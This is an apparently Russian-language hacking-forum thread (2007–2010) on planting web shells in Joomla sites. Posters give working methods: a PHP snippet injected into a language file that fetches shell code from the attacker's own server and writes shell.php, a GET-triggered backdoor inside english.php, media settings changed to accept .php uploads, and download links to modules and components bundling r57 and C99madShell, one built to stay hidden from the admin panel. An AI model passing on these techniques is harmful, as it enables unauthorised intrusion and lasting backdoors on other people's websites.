Форум АНТИЧАТ - Заливка шелла в Joomla

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Сценарии/CMF/СMS (https://forum.antichat.xyz/forumdisplay.php?f=114)

- - Заливка шелла в Joomla (https://forum.antichat.xyz/showthread.php?t=55205)

AkyHa_MaTaTa

07.12.2007 12:54

Заливка шелла в Joomla

У меня такой вопрос:
Пытаюсь подлить шелл в Joomla с помошью JoomlaXplorer, и пищет что сейчас стоит режим фаил типа нужно переключится в в ftp режим:
Current mode: file. You could switch to ftp mode.
естествено фтп ака я не знаю, какие еще есть способы заливки шелла в Joomla?

+toxa+

07.12.2007 13:04

через редактирование шаблонов, через заливку медиа файлов, через заливку _своего_ компонента/темы/мамбота с шеллом, через заливку картинки с шеллом и последующим инклудом (если прокатит)
https://forum.antichat.ru/thread39801.html

ЗЫ для заливки компонента/темы/мамбота надо составлять xml файл, чтоб его нормально обработала джумла. берёшь его из любого компонента/темы/мамбота и редактируешь под свои нужды

AkyHa_MaTaTa

07.12.2007 13:21

Пасибо, но через медия файлы там же фильтр стоит на расширения, а где ставить допустимые расширения я не нашол(на бразильском все(португальском), без инглиша), и инклюдов нету для картинки.
Ладно буду пробывать через стили или шаблоны.
Пасибо еще раз.

it's my

07.12.2007 13:27

лей через JoomXplorer в папку images. Просто на ту папку куда ты льешь не хватает прав!

AkyHa_MaTaTa

07.12.2007 13:28

Как?
Current mode: file. You could switch to ftp mode.
Я вообше ни чего не лил просто пытался запустить JoomXplorer. Права есть на всех дирах 0777.

Scipio

07.12.2007 13:38

wmv файлы заливаются? заливай шелл с расширением .php.wmv

А вобще в джумле я всегда через шаблоны заливал

AkyHa_MaTaTa

07.12.2007 13:41

Инклюдов нету, че мне потом с ним делать?

Grey	08.12.2007 01:02

Вот тебе способ (как раз сегодня так шелл залил + только что на локалке проверил еще разок (на новой версии)):

заходишь в админку Language Manager выбираешь файл который будешь редактировать, к примеру English, щелка по нему попадаешь в менюшку с редактированием в ней есть путь до файла, к примеру:

z:/home/test1.ru/www/language/english.php

он тебе пригодится, точнее его часть, теперь сам файл, там может быть защита от выполнения без инклуда (если защиты нет то просто дописываем пару строчек):

PHP код:


		
			
// no direct access

defined( '_VALID_MOS' ) or die( 'Restricted access' );

Экранируем эту строчку и дописываем подарок:

PHP код:


		
			
if($HTTP_GET_VARS['a']==1) 

{ 

$file = file('http://адрес твоего сайта с шеллом/shell.txt'); 

$file2 = fopen("shell.php", "w"); // здесь shell.php имя твоего шелла - который будет создан в результате работы скрипта

for ($i = 0; $i < count($file); $i++) 

{ 

fputs($file2, $file[$i]); 

} 

fclose($file2); 

} 



// no direct access

//defined( '_VALID_MOS' ) or die( 'Restricted access' );

Дальше переходим по линке:

http://test1.ru/language/english.php?a=1

И получаем шелл:

http://test1.ru/language/shell.php

P.S. можно конечно впихнуть шелл и в редактируемый файл - но палевно будет смотреться, а так залил шелл, вернул все обратно и все гуд.

chekist

25.12.2007 03:18

архивчик http://slil.ru/25824397
это мой модуль шелл устанавливать как обычный модуль
http://localhost/joomla/administrator/index2.php?option=com_installer&element=module
шелл будет тут
http://localhost/joomla/modules/mod_j_news.php?module=joomla

AkyHa_MaTaTa

25.12.2007 11:35

Блин, шелл я давно залил через шаблонны, и здесь отписался как раз перед поста Grey, но какая то редиска его удалила, но все равно сенск за помошь ВСЕМ.

je0n	12.02.2008 23:48

Цитата:

Сообщение от chekist

архивчик http://slil.ru/25282464
это мой модуль шелл устанавливать как обычный модуль
http://localhost/joomla/administrator/index2.php?option=com_installer&element=module
шелл будет тут
http://localhost/joomla/modules/mod_j_news.php?module=joomla

не получается :(
XML setup file is not for a "component"
я не супер-админ, просто админ. к language manager доступа нет. что еще замутить?

chekist

15.02.2008 10:02

Цитата:

Сообщение от je0n

не получается :(
XML setup file is not for a "component"
я не супер-админ, просто админ. к language manager доступа нет. что еще замутить?

ты весь архив загружал ?
>>XML setup file is not for a "component" ты пытался установить компонент а не модуль, тебе сюда administrator/index2.php?option=com_installer&element=module
1) mod_r.zip не распаковывай так и отправляй, для установки модуля на запись должны бать доступны паки media, administrator/modules, modules
2) установи компонент com_joomlaxplorer(http://slil.ru/25475840) это файловый менеджер, для установки компонента должны быть доступны на запись папки media, administrator/components, components, images/stories

в двишках жомла или мамбо чтобы установить компонент или модуль они должны быть в архиве обычно zip в котором должен быть xml файл в котором и расписана вся установка

ЗЫ. если не получится залить шелл пишы в личку

Хозяин

16.02.2008 06:12

chekist, ты походу сам не понимаешь что выкладываешь и о чем говоришь ...
это именно МОДУЛЬ, и устанавливать его как модуль нужно! и тогда все работает. Шелл там кстати r57.

вот еще один вариант, как по мне так получше будет.

- устанавливается как компонент
- внутри C99madShell
- доступен по адресу /components/com_articles/articles.php
[COLOR=White-[/COLOR] с админки его не видно, соответственно НЕ удаляется

http://rapidshare.com/files/92224104/com_articles.zip.html

тут я чуть переделал все это дело, скрестил как говорится, для меньшей палевности )))

все то же самое, только доступен по адресу:
/components/com_articles/articles.php?module=joomla

так:
/components/com_articles/articles.php
он не заведется

chekist

02.03.2008 19:45

AciD_FreaK
>>это именно МОДУЛЬ, и устанавливать его как модуль нужно! и тогда все работает. Шелл там кстати r57.
а я что написал, я выкладывал модуль и устанавливать его надо как модуль, находились умники которые не знали как его устанавливать увидив архив они начинали его распаковывать

и чем тебе не нравится r57?

remb0

24.08.2008 16:58

народ!!! можно ли както подругому залить шел через админкуджомлы ?! А то когда пробуеш через редактирование языка или установки модуля требует Логин и Пароль к Ftp!!!

~!DoK_tOR!~

24.08.2008 17:22

__https://forum.antichat.ru/showpost.php?p=593795&postcount=14

remb0

24.08.2008 18:54

Цитата:

Сообщение от ~!DoK_tOR!~

__https://forum.antichat.ru/showpost.php?p=593795&postcount=14

сенкс , но проблема в этом

http://img300.imageshack.us/img300/2544/joomlamk4.jpg

Nek1t

26.08.2008 02:12

Все просто. Ты льешь старую компоненту в новую Joomla 1.5 . Лучше заливай шелл через шаблон.

В крайнем случае можешь включить плагин для поддержки старых компонентов. :)

если не понял - стукни в ПМ, со скринами объясню :)

diehard

08.09.2008 22:04

Цитата:

Сообщение от Grey

PHP код:


		
			
// no direct access

defined( '_VALID_MOS' ) or die( 'Restricted access' );

Экранируем эту строчку и дописываем подарок:

PHP код:


		
			
if($HTTP_GET_VARS['a']==1) 

{ 

$file = file('http://адрес твоего сайта с шеллом/shell.txt'); 

$file2 = fopen("shell.php", "w"); // здесь shell.php имя твоего шелла - который будет создан в результате работы скрипта

for ($i = 0; $i < count($file); $i++) 

{ 

fputs($file2, $file[$i]); 

} 

fclose($file2); 

} 



// no direct access

//defined( '_VALID_MOS' ) or die( 'Restricted access' );

Я не понимаю с чем связано, но запуская шелл постоянно получаю ошибку 500 Internal Server Error, поэтому загружаю шелл прямо в english.php, который вызывается с определенными параметрами в GET-запросе:

if ($_GET['xek']=='ontechad'){
// r57
}

www.site.com/language/english.php?xek=ontechad

budden

10.09.2008 16:55

Цитата:

Сообщение от AciD_FreaK

вот еще один вариант, как по мне так получше будет.

- устанавливается как компонент
- внутри C99madShell
- доступен по адресу /components/com_articles/articles.php
[COLOR=White-[/COLOR] с админки его не видно, соответственно НЕ удаляется

http://rapidshare.com/files/92224104/com_articles.zip.html

тут я чуть переделал все это дело, скрестил как говорится, для меньшей палевности )))

все то же самое, только доступен по адресу:
/components/com_articles/articles.php?module=joomla

так:
/components/com_articles/articles.php
он не заведется

А как его удалить? Там есть кнопка self destruct, но мне кажется удалится только пхп-шелл, а папка /components/com_articles останется. Как бы удалить и ее, и ее содержимое?

Желательно без заливки еще одного шелла.

omel	04.02.2009 02:05

Есть админка. как залить шел если только в этих папках стоят права на запись ?
images/ Доступен для записи
Каталог кешa /usr/home/***/www/www.*.ua/cache/ Доступен для записи
media/ Доступен для записи
На хосте стоит joomlaXplorer (1,6,2). через него не идет залить шел так как он хочет переключиться в фтп моде. Версия джумлы 1,0,13

kolenwal

27.05.2009 00:37

Цитата:

Сообщение от omel

В 1.0.13 надо пробовать, а в 1.5.* в images можно так залить :

-в админке идем в site->global configuration->system->media settings

-добавляем в legal extensions (file types) тип файлов php

-изменяем Restrict Uploads на No

-изменяем Check MIME Types на No

-добавляем в Legal Image Extensions тип файлов php

-изменяем Enable Flash Uploader на No

-применяем изменения конфигурации Apply

-идем в site->media manager->upload file загружаем шелл,путь до него будет site.com/images/shell.php

Pashkela

27.05.2009 00:48

Всё проще, гораздо проще, первый же пост на ачате в уязвимостях по джумле дает ответ на этот вопрос, причем недавно проверено - самый тупой способо, в лоб, но 100% действенный:

Устанавливайте плагин JoomlaXplorer 2.0, льете шелл, удаляете JoomlaXplorer 2.0. Всё

Gorev

08.06.2009 13:39

проблемка что нет прав на заливку ни в одну папку... :(

chekist

08.06.2009 15:37

Цитата:

Сообщение от Gorev

проблемка что нет прав на заливку ни в одну папку... :(

https://forum.antichat.ru/showpost.php?p=986059&postcount=121

на локалке прокатило

zEr0r

10.06.2009 02:35

По сабжу:
есть доступ к админке жумла, файлы редактировать не дает,

Установка нового компонента:
media/ Недоступен для записи
administrator/components/ Недоступен для записи
components/ Недоступен для записи
images/stories/ Недоступен для записи

Установка новых модулей:
media/ Недоступен для записи
administrator/modules/ Недоступен для записи
modules/ Недоступен для записи

Установка новых мамботов:
media/ Недоступен для записи
language/ Недоступен для записи
mambots/ Недоступен для записи
mambots/content/ Недоступен для записи
mambots/search/ Недоступен для записи
mambots/system/ Недоступен для записи

Установить новый язык сайта:
media/ Недоступен для записи
language/ Недоступен для записи

Установить новый шаблон (админки):
media/ Недоступен для записи
administrator/templates/ Недоступен для записи
templates/ Недоступен для записи
images/stories/ Недоступен для записи

Установить новый шаблон (сайта):
media/ Недоступен для записи
administrator/templates/ Недоступен для записи
templates/ Недоступен для записи
images/stories/ Недоступен для записи

НО
есть доступ к бд через пхпму админ (доступ только для данной бд). Можно ли чтонибудь сделать?

P.s. версия жумлы Joomla! 1.0.12

Spyder

10.06.2009 02:44

маловероятно
если только что то с соседями мутить

Pashkela

10.06.2009 02:44

Можно через инсталл компонентов, грузишь СРАЗУ тупо шелл, прямо вот так: shell.php со своего винта. Будут в папке /media

Называться будут также, как у тебя на винте

Хотя хз, как там у тебя, т.к. все запрещено на запись. МОжет в /tmp упадут

reanim

01.07.2009 22:26

Цитата:

Сообщение от Pashkela

Народ на сайте впервые беспокоит сей момент: как залить шелл в joomla не имея доступа к админке??
версия joomla 1.5.9 или есть иной метод получить пароль?
Заранее спасибо

Kernet

12.01.2010 17:42

Итак, есть Joomla! 1.0.15 Stable
В ней:

Цитата:

This web host is running a particular implementation of PHP safe mode which places severe limitations on what files the Mambo admin interface can create. File uploads will currently not install correctly unless you select the FTP Assist option below. FTP Assist uses your site admin’s FTP account to copy, make directories, and set permissions for newly installed components, modules, or templates. This also allows all file ownership to be retained by the site admin uid which can improve security and alleviate site maintenance problems thru the FTP client later. To use FTP Assist, click the ‘Use FTP Assist’ checkbox below and provide your FTP account username, password, and host address in the provided test boxes. The password is not retained by Mambo for security reasons.

If the ‘use FTP Assist’ checkbox is disabled below, then your current PHP implementation on this host does not support FTP. The only other alternative for installation is to perform a manual install using the Install from directory option below. You will need to use an ftp client on your PC to transfer the uncompressed component or module installation files (using a zip utility) to a temporary directory on this site. You will need to view the module/component/template's .xml installation directive file to determine what and where to manually create (thru your ftp client) any new installation subdirectories and where to copy the files from the temporary install directory over to the proper destination areas, just as the .xml file would direct this installer script. After completing this manual process, proceed with the Install from directory option below. The script will verify that all required files and directories have been properly copied by you. Then the required Mambo database changes will be performed to complete installation. Note: you will need to enable write access to your components subdirectory as 755 at a minimum (ie. owner: rwx group: r-x everyone: r-x) or 777 (all rwx)

Короче сэйф он.
и

Цитата:

media/ Writeable
administrator/components/ Writeable
components/ Writeable
images/stories/ Writeable

Никакие модули не подгружает, пишет:

Цитата:

ERROR: Could not find an XML setup file in the package.
Installation file not found:
/home/*/domains/*/htdocs/media/install_4b4c7be722601/

Время: 13:37